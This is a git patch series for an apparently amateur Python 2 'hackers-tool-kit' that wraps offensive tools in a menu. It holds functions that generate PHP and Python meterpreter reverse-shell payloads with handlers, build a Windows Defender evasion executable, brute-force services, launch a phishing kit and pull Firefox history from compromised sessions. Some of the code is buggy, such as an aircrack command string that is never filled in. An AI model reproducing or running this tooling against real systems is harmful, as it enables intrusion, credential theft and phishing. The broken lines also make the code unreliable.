hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#PYLOAD START# +#------------# +def pyload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> pyload.rc') + os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') + os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) + os.system('echo "exploit\n" >> pyload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r pyload.rc') + os.system('rm -rf pyload.rc') + if yn == "n": + os.system('echo " "') +#----------# +#PYLOAD END# + + +#FOXHIS START# +#------------# +def foxhis(): + os.system('echo "sessions\n" >> foxhisses.rc') + os.system('echo "exit\n" >> foxhisses.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r foxhisses.rc') + os.system('rm -rf foxhisses.rc') + print "\n" + ses = raw_input("Session: ") + print "\nMaximum time (seconds) to wait for a response\n" + time = raw_input("Timeout: ") + os.system('echo "use firefox/gather/history\n" >> foxhis.rc') + os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) + os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) + os.system('echo "run\n" >> foxhis.rc') + os.system('msfconsole -q -r foxhis.rc') + os.system('rm -fr foxhis.rc') +#----------# +#FOXHIS END# + + +#RHAWK START# +#-----------# +def rhawk(): + os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") +#---------# +#RHAWK END# + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + if x == "pyload": + pyload() + if x == "foxhis": + foxhis() + if x == "rhawk": + rhawk() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 2fb7ff2a146d28d9c0d3b5cc051337909eea339a Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 29 May 2019 01:09:39 +0100 Subject: [PATCH 159/214] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index b659d24..8446b99 100644 --- a/README.md +++ b/README.md @@ -54,3 +54,5 @@ this is where i will try to put the most recent updates * added python and php payload maker * added a foxhis option (firefox history gather) + +* added the RED_HAWK tool (rhawk option) From 5e59cbcaf80b873defa36d40d9ed479822f8277f Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 29 May 2019 01:33:28 +0100 Subject: [PATCH 160/214] Delete htk.py --- htk.py | 3102 -------------------------------------------------------- 1 file changed, 3102 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index b96da38..0000000 --- a/htk.py +++ /dev/null @@ -1,3102 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @tuf_unkn0wn -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - 